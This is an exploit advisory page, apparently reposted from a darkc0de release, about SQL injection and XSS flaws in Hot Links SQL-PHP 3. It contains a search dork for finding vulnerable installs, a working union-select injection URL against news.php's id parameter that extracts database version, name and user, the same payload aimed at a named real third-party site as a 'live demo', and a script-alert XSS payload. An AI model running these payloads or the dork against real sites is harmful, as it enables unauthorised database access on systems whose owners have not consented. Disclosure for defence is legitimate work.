Hot Links SQL-PHP 3 (news.php) SQL Injection Vulnerabilities

2009-08-28 / 2009-08-29
Credit: r45c4l
Risk: High
Local: No
Remote: Yes
CWE: CWE-89
CWE-79

################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ \ _ \ __| _/____ # # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # # \/ \/ \/ # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ \ \/ \/ / # # \ \___| | \/\ ___/\ / # # \___ >__| \___ >\/\_/ # # est.2007 \/ \/ forum.darkc0de.com # ################################################################ # --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu # # ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE # # and all darkc0de members ---# ################################################################ # # Author: r45c4l # # Home : www.darkc0de.com # # Email : r45c4l@hotmail.com # # Share the c0de! # ################################################################ # # Title: Hot Links SQL-PHP 3 (news.php) SQL Injection Vulnerabilities # Vendor: http://www.mrcgiguy.com # Vulnerable Version: 3 and prior versions # Fix: N/A # ########################################################### # # d0rk: "Powered By: Hot Links SQL-PHP 3" # # ########################################################### Vulnerabilities SQL Injection in "news.php" in the "id" parameter. PoC http://localhost/path/news.php?id=-1+union+all+select+1,concat(version(),0x3a,database(),0x3a,user()),null,null-- Live Demo: http://www.dalleh.net/tv1/news.php?id=-1+union+all+select+1,concat(version(),0x3a,database(),0x3a,user()),null,null-- There is a XSS too in the search bar on the left hand side of the page-- user can type this in search bar <script>alert(0);</script> ########################################################### # # Bug discovered : 09 Sep.2008 ###########################################################

References:

http://www.packetstormsecurity.org/0809-exploits/hotlinks-sql.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top